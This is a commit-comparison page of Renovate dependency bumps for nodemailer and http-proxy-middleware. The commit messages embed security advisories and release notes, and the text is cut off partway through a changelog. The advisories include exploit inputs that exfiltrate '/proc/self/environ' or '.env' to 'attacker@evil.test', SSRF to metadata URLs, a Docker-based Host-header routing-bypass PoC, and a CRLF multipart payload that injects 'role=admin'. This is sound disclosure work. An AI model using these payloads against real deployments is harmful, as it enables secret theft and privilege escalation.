Compare commits

...

12 Commits

Author SHA1 Message Date
renovate[bot] e343802b2d chore: bump up Apollo GraphQL packages 2026-06-19 15:00:15 +00:00
renovate[bot] 7ea8800c99 chore: bump up nodemailer version to v9 [SECURITY] (#15134)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [nodemailer](https://nodemailer.com/)
([source](https://redirect.github.com/nodemailer/nodemailer)) |
[`^8.0.11` →
`^9.0.0`](https://renovatebot.com/diffs/npm/nodemailer/8.0.11/9.0.1) |
![age](https://developer.mend.io/api/mc/badges/age/npm/nodemailer/9.0.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/nodemailer/8.0.11/9.0.1?slim=true)
|

---

### Nodemailer: Message-level raw option bypasses
disableFileAccess/disableUrlAccess, enabling arbitrary file read and
full-response SSRF in the delivered message

[GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f)

<details>
<summary>More information</summary>

#### Details
##### Message-level `raw` option bypasses `disableFileAccess` /
`disableUrlAccess`, enabling arbitrary file read and full-response SSRF
in the sent message

- **Target:** nodemailer/nodemailer, npm `nodemailer` **v9.0.0** (HEAD
`4e58450eb490e5097a74b2b2cce35a8d9e21856e`)
- **Verdict:** CONFIRMED (local PoC, no network)

##### Summary

Nodemailer exposes `disableFileAccess` and `disableUrlAccess` so an
application that passes
**untrusted** message data to the library can forbid that data from
reading local files or
fetching URLs. Every attachment, alternative,
`html`/`text`/`watchHtml`/`amp` and `icalEvent`
content node honors these flags. **The message-level `raw` option does
not.**

`MailComposer.compile()` builds the root MIME node for a `raw` message
**without** threading the
two flags, so a `raw: { path: '/etc/passwd' }` or `raw: { href:
'http://169.254.169.254/…' }`
message is read / fetched anyway, and the file or HTTP-response bytes
become the **actual
message that is sent** by every transport (SMTP, SES, sendmail, stream,
JSON). An actor whose
input the application intended to sandbox therefore obtains arbitrary
local-file disclosure and
a full-response SSRF primitive, delivered to a recipient the same actor
can choose.

This is the same vulnerability class as the already-published
jsonTransport advisory
**GHSA-wqvq-jvpq-h66f**, but a **distinct code path** (`raw` root node,
not `normalize()`), and
strictly higher impact: the jsonTransport bug only affected the
locally-returned JSON, whereas
this affects the delivered RFC822 message for all transports.

##### Affected component

- `lib/mail-composer/index.js:34-35` — root cause:
  ```js
  if (this.mail.raw) {
this.message = new MimeNode('message/rfc822', { newline:
this.mail.newline }).setRaw(this.mail.raw);
  }
  ```
The `MimeNode` is constructed with only `{ newline }`. Compare the
sibling node builders

`_createMixed`/`_createAlternative`/`_createRelated`/`_createContentNode`
  (`lib/mail-composer/index.js:389-527`), which all pass
`disableUrlAccess: this.mail.disableUrlAccess, disableFileAccess:
this.mail.disableFileAccess`.
- `lib/mime-node/index.js:51-52` — the constructor derives
`this.disableFileAccess`/
`this.disableUrlAccess` solely from its own `options`; children do
**not** inherit a parent's
flags (`createChild`/`appendChild`, lines 175-194, pass options through
verbatim).
- `lib/mime-node/index.js:812` — `setRaw()` content is resolved through
`this._getStream(this._raw)`.
- `lib/mime-node/index.js:984-1010` — `_getStream` reads the file
(`fs.createReadStream`, 995) or
fetches the URL (`nmfetch`, 1009) **only guarded by
`this.disableFileAccess`/`this.disableUrlAccess`**,
  which on the `raw` root node are `false`.
- Reached from the normal send flow at `lib/mailer/index.js:188`
(`mail.message = new MailComposer(mail.data).compile()`), so every
transport is affected.

##### Reachability gate (hop-by-hop)

1. **Source.** Application calls `transporter.sendMail({ raw:
<userControlled> , to: <userControlled> })`
with `disableFileAccess: true` and/or `disableUrlAccess: true`
configured on the transporter
(forced onto `mail.data` in `lib/mailer/mail-message.js:36-40`) or per
message. This is the
exact scenario the flags exist for — the same precondition under which
GHSA-wqvq-jvpq-h66f was
   accepted.
2. **Guard — the access flags.** For attachments the flag is enforced: a
node created by
`_createContentNode` carries `disableFileAccess`, so `_getStream` throws
`EFILEACCESS`.
**Bypass:** the `raw` branch (`compile():34-35`) never sets the flag on
its node, so
`this.disableFileAccess === false` and the guard at `mime-node:985` /
`:999` is skipped.
There is no other validation between `mail.raw` and the read; `raw`
content shapes
(`{path}`, `{href}`, stream, string, buffer) are accepted as-is by
`setRaw`/`_getStream`.
3. **Sink.** `fs.createReadStream(content.path)` (file disclosure) or
`nmfetch(content.href, …)` (SSRF). The resulting bytes are emitted as
the message body by
   `createReadStream()`, which every transport pipes to its destination
(`smtp-transport:233`, `smtp-pool/pool-resource:208`,
`ses-transport:96`, `sendmail-transport:184`,
   `stream-transport:67`).

No guard blocks the chain; the only guard (the access flags) is
structurally absent on this node.

##### Root cause

Inconsistent enforcement: the access policy is applied per-`MimeNode`
via constructor options and
must be re-passed at every node creation. The `raw`-message shortcut in
`compile()` omits it,
while all five other node builders include it. The flags are therefore
enforced for every content
type *except* the one that lets the caller supply a complete message
body by path/URL.

##### Exploit path

Application that sandboxes untrusted mail input
(`disableFileAccess`/`disableUrlAccess` set):

1. Untrusted actor supplies `raw: { path: '/proc/self/environ' }` (or
any server file:
   `/app/.env`, key material, etc.) and `to: attacker@evil.test`.
2. `compile()` builds the raw root node without the flags; the transport
reads the file and sends
its contents as the message → **arbitrary server-file exfiltration to an
attacker-chosen mailbox.**
3. Alternatively `raw: { href: 'http://127.0.0.1:8080/admin' }` or a
cloud metadata URL →
Nodemailer fetches it server-side and delivers the full response body in
the email →
   **full-response SSRF** (no blind-channel limitation).

##### Impact

- **Confidentiality (High):** arbitrary local file read disclosed in the
outgoing message;
full-response SSRF to internal/metadata endpoints, also disclosed in the
message.
- **Integrity (Low):** attacker-fetched/file content is injected into
the delivered mail.
- The two protective flags an application relies on to contain untrusted
input are silently
  ineffective for `raw`.

##### Preconditions

The application (a) passes `disableFileAccess` and/or `disableUrlAccess`
(the documented sandboxing
flags) and (b) lets untrusted input influence the `raw` field (and, for
maximal disclosure, `to`).
No other configuration is required; all bundled transports are affected.
This mirrors the accepted
precondition of GHSA-wqvq-jvpq-h66f.

##### Severity

- **AV** — message data routinely originates over the network in the
apps these flags protect.
- **AC** — a single crafted `raw` object; deterministic.
- **PR** — the actor is a user whose input the app already treats as
untrusted (the reason the
  flags are set); not fully anonymous in the typical deployment.
- **UI** — no victim interaction.
- **S** — impact within Nodemailer's process scope.
- **C** — arbitrary file read **and** full-response SSRF, both delivered
to an attacker-chosen
recipient. (The sibling jsonTransport advisory used C:L because its leak
stayed in locally-returned
JSON; here the bytes leave the system in the sent message, so C:H is
warranted.)
- **I** — attacker injects fetched/file bytes into the outgoing message.
- **A**.
Note: if a deployment fixes the recipient (`to` not attacker-controlled)
the disclosure channel
narrows and the rating degrades toward the sibling's Medium; the High
rating reflects the
reasonable worst case where `raw` and `to` are both untrusted.

##### Adversarial re-read (attempts to refute)

1. **"`raw` content is by-design trusted, so the flags shouldn't
apply."** Rejected: every other
content path (attachments, alternatives, html/text, icalEvent) honors
the flags, and the
maintainer already accepted GHSA-wqvq-jvpq-h66f for exactly this
"untrusted input + flag set"
model. The asymmetry — attachment `{path}` is blocked but `raw:{path}`
is not — is the bug, and
the PoC's CONTROL case proves the flag is otherwise effective on the
same file.
2. **"The raw node inherits the flags via rootNode."** Rejected by code
and by PoC: `compile():35`
constructs the node with `{ newline }` only; `MimeNode` constructor sets
`this.disableFileAccess = !!options.disableFileAccess` → `false`;
`rootNode` is itself; no
   inheritance exists.
3. **"The PoC leaks for an unrelated reason."** Rejected: the CONTROL
message (`attachments:[{path}]`,
same file, same transporter) returns `EFILEACCESS`; only the
`raw:{path}` message leaks. The
sentinel nonce exists solely in the temp file; the URL nonce is
generated server-side and is only
obtainable by an actual fetch. Both observables are uniquely bound to
the bypass.
4. **"Maybe only jsonTransport (already reported) is affected."**
Rejected: the PoC uses
`streamTransport` and the root cause is in `MailComposer.compile()`
(`mailer:188`), shared by all
   transports; jsonTransport is a different (already-fixed) path.

I could not find any guard that blocks the chain; the finding survives.

##### Proof of concept (safe, benign)

`findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` — local, no
network egress (loopback only),
no destructive action. Output:
```
[CONTROL] attachment path with disableFileAccess: BLOCKED (EFILEACCESS) — flag works here
[ATTACK]  raw:{path} with disableFileAccess=true: BYPASSED — sentinel file CONTENT present in message
[ATTACK]  raw:{href} with disableUrlAccess=true (loopback server): BYPASSED — fetched body present (SSRF)
VERDICT: CONFIRMED
```
Run: `node findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` (exit 0
= confirmed).

##### Remediation

Thread the access policy onto the `raw` root node, exactly as the other
builders do:
```js
if (this.mail.raw) {
    this.message = new MimeNode('message/rfc822', {
        newline: this.mail.newline,
        disableFileAccess: this.mail.disableFileAccess,
        disableUrlAccess: this.mail.disableUrlAccess
    }).setRaw(this.mail.raw);
}
```
(Defense in depth: `setRaw`/`_getStream` could also refuse
`{path}`/`{href}` raw content when either
flag is set, regardless of how the node was constructed.) Add a
regression test asserting that
`raw:{path}` and `raw:{href}` reject with `EFILEACCESS`/`EURLACCESS`
when the flags are set, mirroring
the attachment tests.

#### Severity
- CVSS Score: 7.1 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N`

#### References
-
[https://github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f)
-
[https://github.com/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>nodemailer/nodemailer (nodemailer)</summary>

###
[`v9.0.1`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#901-2026-06-17)

[Compare
Source](https://redirect.github.com/nodemailer/nodemailer/compare/v9.0.0...v9.0.1)

##### Bug Fixes

- enforce disableFileAccess/disableUrlAccess for raw message option
([a82e060](https://redirect.github.com/nodemailer/nodemailer/commit/a82e060d978f27e5f41369a9a9807b1e3dedc2e2))

###
[`v9.0.0`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#900-2026-06-14)

[Compare
Source](https://redirect.github.com/nodemailer/nodemailer/compare/v8.0.11...v9.0.0)

##### ⚠ BREAKING CHANGES

- HTTPS requests made while fetching remote content (attachment
href/path URLs, OAuth2 token endpoints, HTTP/HTTPS proxy CONNECT) now
validate the server's TLS certificate by default. Requests to hosts with
self-signed, expired, or hostname-mismatched certificates that
previously succeeded will now fail. Opt back out per request with
tls.rejectUnauthorized=false (transport options, or a per-attachment
`tls` option).

##### Bug Fixes

- replace deprecated url.parse with a WHATWG URL wrapper
([0c080fb](https://redirect.github.com/nodemailer/nodemailer/commit/0c080fbf3278926f013a5c2ad06f5f6f0e18f5ed))
- validate TLS certificates by default when fetching remote content
([6a947ac](https://redirect.github.com/nodemailer/nodemailer/commit/6a947ac7114a16da1e6a50d9a6f4e17026ce145d))

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-19 22:51:23 +08:00
renovate[bot] 16196c6ca1 chore: bump up http-proxy-middleware version to v3.0.7 [SECURITY] (#15131)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[http-proxy-middleware](https://redirect.github.com/chimurai/http-proxy-middleware)
| [`3.0.5` →
`3.0.7`](https://renovatebot.com/diffs/npm/http-proxy-middleware/3.0.5/3.0.7)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/http-proxy-middleware/3.0.7?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/http-proxy-middleware/3.0.5/3.0.7?slim=true)
|

---

### http-proxy-middleware `router` host+path substring matching allows
Host-header-driven backend routing bypass
[CVE-2026-55602](https://nvd.nist.gov/vuln/detail/CVE-2026-55602) /
[GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj)

<details>
<summary>More information</summary>

#### Details
##### Summary

`http-proxy-middleware` documents `router` proxy-table entries as host,
path, or host+path selectors, but the host+path implementation uses
unanchored substring matching on attacker-controlled request metadata.
As a result, a crafted `Host` header that is only a superstring match
for a configured host+path key can still route a request to an
unintended backend.

##### Details

Tested code state:

- validated on tag `v4.0.0-beta.5`
- corresponding commit: `339f09ede860197807d4fd99ed9020fa5d0bd358`

Relevant code locations:

- `src/router.ts`
- `src/http-proxy-middleware.ts`

Affected public API:

- `createProxyMiddleware({ router: { 'host/path': 'http://target' } })`

Code explanation:

When a proxy-table router key contains `/`, `getTargetFromProxyTable()`
concatenates attacker-controlled `req.headers.host` and `req.url` into a
single `hostAndPath` string, then accepts the route if:

```ts
hostAndPath.indexOf(key) > -1
```

That is a substring test, not an exact host match plus intended path
match. In the validated PoC, the configured router key is:

```txt
localhost:3000/api
```

but the attacker-controlled host is:

```txt
evillocalhost:3000
```

and the request path is:

```txt
/api
```

The concatenated attacker-controlled string:

```txt
evillocalhost:3000/api
```

still contains the configured router key as a substring, so the
middleware selects the alternate backend even though the host is not
equal to the configured host.

Exploit path:

1. the application enables the documented proxy-table `router` feature
with at least one host+path rule
2. an external attacker sends an ordinary HTTP request with a crafted
`Host` header
3. `HttpProxyMiddleware.prepareProxyRequest()` applies router selection
before proxying
4. `getTargetFromProxyTable()` accepts the crafted `Host + path` string
through substring matching
5. the request is proxied to the wrong backend

##### PoC

Create these files in the same working directory and run:

```bash
bash ./run.sh
```

##### File: `run.sh`

```bash

#!/usr/bin/env bash
set -euo pipefail

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
REPO_URL="https://github.com/chimurai/http-proxy-middleware.git"
REPO_REF="v4.0.0-beta.5"
WORKDIR="$(mktemp -d "${SCRIPT_DIR}/.tmp-repro.XXXXXX")"
TARGET_REPO_DIR="${WORKDIR}/repo"
REPRO_DIR="${WORKDIR}/reproduction"
IMAGE_TAG="http-proxy-middleware-router-bypass-poc"

cleanup() {
  rm -rf "${WORKDIR}"
}
trap cleanup EXIT

echo "[a3] cloning target repository"
git clone --quiet "${REPO_URL}" "${TARGET_REPO_DIR}"
git -C "${TARGET_REPO_DIR}" checkout --quiet "${REPO_REF}"

mkdir -p "${REPRO_DIR}"
cp "${SCRIPT_DIR}/Dockerfile" "${WORKDIR}/Dockerfile"
cp "${SCRIPT_DIR}/verify.mjs" "${REPRO_DIR}/verify.mjs"

echo "[a3] building reproduction image"
docker build -f "${WORKDIR}/Dockerfile" -t "${IMAGE_TAG}" "${WORKDIR}"

echo "[a3] running verification"
docker run --rm "${IMAGE_TAG}" node /work/reproduction/verify.mjs
```

##### File: `Dockerfile`

```Dockerfile
FROM node:22-bullseye

WORKDIR /work

COPY repo/package.json repo/yarn.lock /work/repo/

RUN corepack enable \
  && cd /work/repo \
  && yarn install --frozen-lockfile

COPY repo /work/repo
RUN cd /work/repo && yarn build

COPY reproduction /work/reproduction
```

##### File: `verify.mjs`

```js
import http from 'node:http';
import fs from 'node:fs';
import assert from 'node:assert/strict';

import { createProxyMiddleware } from '/work/repo/dist/index.js';

const ROUTER_KEY = 'localhost:3000/api';
const CRAFTED_HOST = 'evillocalhost:3000';

function listen(server, port) {
  return new Promise((resolve) => {
    server.listen(port, '127.0.0.1', () => resolve());
  });
}

function close(server) {
  return new Promise((resolve, reject) => {
    server.close((err) => {
      if (err) {
        reject(err);
        return;
      }
      resolve();
    });
  });
}

function request(path, host) {
  return new Promise((resolve, reject) => {
    const req = http.request(
      {
        host: '127.0.0.1',
        port: 3000,
        path,
        method: 'GET',
        headers: {
          Host: host,
        },
      },
      (res) => {
        let data = '';
        res.setEncoding('utf8');
        res.on('data', (chunk) => {
          data += chunk;
        });
        res.on('end', () => {
          resolve({ statusCode: res.statusCode, body: data });
        });
      },
    );
    req.on('error', reject);
    req.end();
  });
}

const defaultBackend = http.createServer((req, res) => {
  res.end('DEFAULT');
});

const secretBackend = http.createServer((req, res) => {
  res.end('SECRET');
});

const proxyMiddleware = createProxyMiddleware({
  target: 'http://127.0.0.1:3101',
  router: {
    [ROUTER_KEY]: 'http://127.0.0.1:3102',
  },
});

const proxyServer = http.createServer((req, res) => {
  proxyMiddleware(req, res, () => {
    res.statusCode = 404;
    res.end('NO_PROXY');
  });
});

try {
  assert.ok(fs.existsSync('/work/repo/dist/index.js'));
  assert.ok(fs.existsSync('/work/reproduction/verify.mjs'));

  await listen(defaultBackend, 3101);
  await listen(secretBackend, 3102);
  await listen(proxyServer, 3000);
  console.log('STEP start-services ok');

  const baseline = await request('/api', 'safe.example:3000');
  assert.equal(baseline.statusCode, 200);
  assert.equal(baseline.body, 'DEFAULT');
  console.log(`STEP baseline-route body=${baseline.body}`);

  const crafted = await request('/api', CRAFTED_HOST);
  assert.equal(crafted.statusCode, 200);
  assert.equal(crafted.body, 'SECRET');
  assert.notEqual(CRAFTED_HOST, ROUTER_KEY.split('/')[0]);
  console.log(`STEP crafted-route body=${crafted.body}`);

  console.log('RESULT reproduced host_header_injection router substring match bypass');
} finally {
  await Promise.allSettled([close(proxyServer), close(defaultBackend), close(secretBackend)]);
}
```

This PoC starts:

- one default backend returning `DEFAULT`
- one alternate backend returning `SECRET`
- one proxy using:

```js
createProxyMiddleware({
  target: 'http://127.0.0.1:3101',
  router: {
    [ROUTER_KEY]: 'http://127.0.0.1:3102',
  },
});
```

It then sends:

1. a baseline request to `/api` with `Host: safe.example:3000`
2. a crafted request to `/api` with `Host: evillocalhost:3000`

Observed result from the validated PoC:

- baseline request: `STEP baseline-route body=DEFAULT`
- crafted request: `STEP crafted-route body=SECRET`
- success marker: `RESULT reproduced host_header_injection router
substring match bypass`

The PoC is considered successful only if:

1. the baseline request stays on the default backend
2. the crafted request reaches the alternate backend
3. the crafted host is not equal to the configured router host

##### Impact

This is a backend-selection integrity issue in a documented library
feature. Applications that use host+path router-table rules for backend
segmentation, tenant routing, or separation of public and more sensitive
upstreams can have that routing boundary bypassed by an unauthenticated
external client using an ordinary crafted `Host` header.

#### Severity
- CVSS Score: 6.9 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N`

#### References
-
[https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj)
-
[https://github.com/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### http-proxy-middleware: multipart/form-data field injection via
unescaped CRLF in `fixRequestBody`
[CVE-2026-55603](https://nvd.nist.gov/vuln/detail/CVE-2026-55603) /
[GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm)

<details>
<summary>More information</summary>

#### Details
##### Summary
`fixRequestBody()` is the library's documented helper for re-emitting a
request body that was already consumed by a body parser. When the
**outgoing** `Content-Type` is `multipart/form-data`, it rebuilds the
body with `handlerFormDataBodyData()`, which interpolates each
`req.body` key and value directly into the multipart wire format
**without neutralizing CR/LF**:

```js
// dist/handlers/fix-request-body.js
function handlerFormDataBodyData(contentType, data) {
  const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1');
  let str = '';
  for (const [key, value] of Object.entries(data)) {
    str += `--${boundary}\r\nContent-Disposition: form-data; name="${key}"\r\n\r\n${value}\r\n`;
  }
}
```

A `\r\n` inside a value (or key) lets an attacker close the current part
and inject an **entirely new form part**. Because the proxy's own body
parser saw a single opaque value, any gateway-side policy or validation
performed on `req.body` is evaluated against a different set of fields
than the upstream backend ultimately parses a request/parameter
desynchronization across the trust boundary.

By contrast, the sibling output branches are safe: `application/json`
uses `JSON.stringify` (escapes control chars) and
`application/x-www-form-urlencoded` uses `querystring.stringify`
(percent-encodes). Only the multipart branch lacks escaping.

##### Preconditions 
All three must hold; this narrows real-world exposure and is the basis
for `AC:H`:
1. The proxy app populates `req.body` with a **non-multipart** parser
(`express.urlencoded`, `express.json`, or text) so an injected boundary
in a value is **not** split on input.
2. The proxied (outgoing) request is sent as **`multipart/form-data`**
(e.g. an adaptation layer, or any flow that sets the upstream
content-type to multipart), so the vulnerable branch runs.
3. The app calls `fixRequestBody` (the documented pattern for "I
body-parsed, now re-stream"), and an attacker controls at least one body
field value or key.

> Note: a pure multipart-in → multipart-out flow (e.g. `multer`) is
generally **not** exploitable for a *new-field* injection, because the
proxy's multipart parser already splits the injected boundary, so
`req.body` and the backend agree. The desync specifically requires a
non-multipart input parser.

##### Impact
When the preconditions hold, an attacker injects/overrides multipart
fields seen only by the backend:
- **Validation / access-control bypass** bypass gateway-side field
checks (demonstrated below: a gateway that forbids `role=admin` is
bypassed; backend grants admin).
- **Parameter tampering** add or overwrite fields the backend trusts
(IDs, flags, prices).
- **File-part injection** inject a `filename="..."` part into the
upstream multipart stream.

##### Proof of Concept

```js
// npm i http-proxy-middleware@4.0.0   (Node ESM: save as minimal.mjs)
import { fixRequestBody } from 'http-proxy-middleware';

// `req.body` as a NON-multipart parser (express.urlencoded / express.json) yields it.
// The attacker sent  user=alice%0D%0A--BB%0D%0A...  so this ONE field's value holds CRLF:
const req = { readableLength: 0, body: {
  user: 'alice\r\n--BB\r\nContent-Disposition: form-data; name="role"\r\n\r\nadmin\r\n--BB--'
}};

// Minimal stand-in for the outgoing proxy request; capture what gets written.
const out = [];
const proxyReq = {
  h: { 'content-type': 'multipart/form-data; boundary=BB' },
  getHeader(n){ return this.h[n.toLowerCase()]; },
  setHeader(n,v){ this.h[n.toLowerCase()] = v; },
  write(d){ out.push(Buffer.from(d)); },
};

fixRequestBody(proxyReq, req);          // library rebuilds the multipart body
console.log(Buffer.concat(out).toString());
```

Output: one input field becomes **two** parts; `role=admin` was injected
via the unescaped CRLF:

```
--BB
Content-Disposition: form-data; name="user"

alice
--BB
Content-Disposition: form-data; name="role"     <-- injected part; never present in req.body's keys
admin
--BB--
```

`req.body` had a single key (`user`), so any gateway policy checking
`req.body.role` passes, yet the backend's multipart parser receives
`role=admin`. On the wire the attacker simply sends, as
`application/x-www-form-urlencoded`:
`user=alice%0D%0A--BB%0D%0AContent-Disposition:%20form-data;%20name="role"%0D%0A%0D%0Aadmin%0D%0A--BB--`

##### Remediation
Neutralize CR/LF (and `"`) in keys/values before interpolation, or build
the body with a real multipart encoder (e.g. `FormData` / `form-data`)
instead of string concatenation. Minimal fix:

```js
function handlerFormDataBodyData(contentType, data) {
  const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1');
  const bad = /[\r\n]/;
  let str = '';
  for (const [key, value] of Object.entries(data)) {
    const v = String(value);
    if (bad.test(key) || bad.test(v)) {
      throw new Error('fixRequestBody: CR/LF not allowed in multipart field name/value');
    }
    str += `--${boundary}\r\nContent-Disposition: form-data; name="${key.replace(/"/g, '%22')}"\r\n\r\n${v}\r\n`;
  }
}
```
(Reject is preferable to silent stripping, to avoid masking malicious
input.)

#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N`

#### References
-
[https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm)
-
[https://github.com/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>chimurai/http-proxy-middleware
(http-proxy-middleware)</summary>

###
[`v3.0.7`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.7)

[Compare
Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.6...v3.0.7)

#### What's Changed

- fix(fixRequestBody): harden form-data stringification by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1259](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1259)
- chore(package.json): v3.0.7 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1261](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1261)

**Full Changelog**:
<https://github.com/chimurai/http-proxy-middleware/compare/v3.0.6...v3.0.7>

###
[`v3.0.6`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.6)

[Compare
Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.5...v3.0.6)

#### What's Changed

- fix(types): fix Logger type by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1104](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1104)
- fix(fixRequestBody): support text/plain by
[@&#8203;knudtty](https://redirect.github.com/knudtty) in
[#&#8203;1103](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1103)
- chore(examples): bump deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1105](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1105)
- build(prettier): improve prettier setup by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1108](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1108)
- chore(deps): fix punycode node deprecation warning by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1109](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1109)
- chore(examples): bump deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1110](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1110)
- build(codespaces): add devcontainer.json by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1112](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1112)
- chore(package): bump dev dependencies by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1116](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1116)
- ci(github-action): ci.yml add node v24 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1117](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1117)
- chore(package): bump dev dependencies by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1118](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1118)
- chore(package): upgrade to jest v30 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1122](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1122)
- chore(examples): upgrade deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1124](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1124)
- chore(package): update dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1125](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1125)
- test(websocket): fix ws import by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1126](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1126)
- chore(refactor): use `node:` protocol imports by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1127](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1127)
- ci(node24): pin node24 due to TLS issue with mockttp by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1137](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1137)
- docs(recipes/pathRewrite.md): fix comment by
[@&#8203;DEBargha2004](https://redirect.github.com/DEBargha2004) in
[#&#8203;1135](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1135)
- chore(package): bump dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1138](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1138)
- chore(deps): update actions/checkout action to v5 by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1140](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1140)
- fix(error-response-plugin): sanitize input by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
[#&#8203;1141](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1141)
- chore(package.json): update dev deps by
[@&#8203;chimurai](https://redirect.github.com/chimurai) in
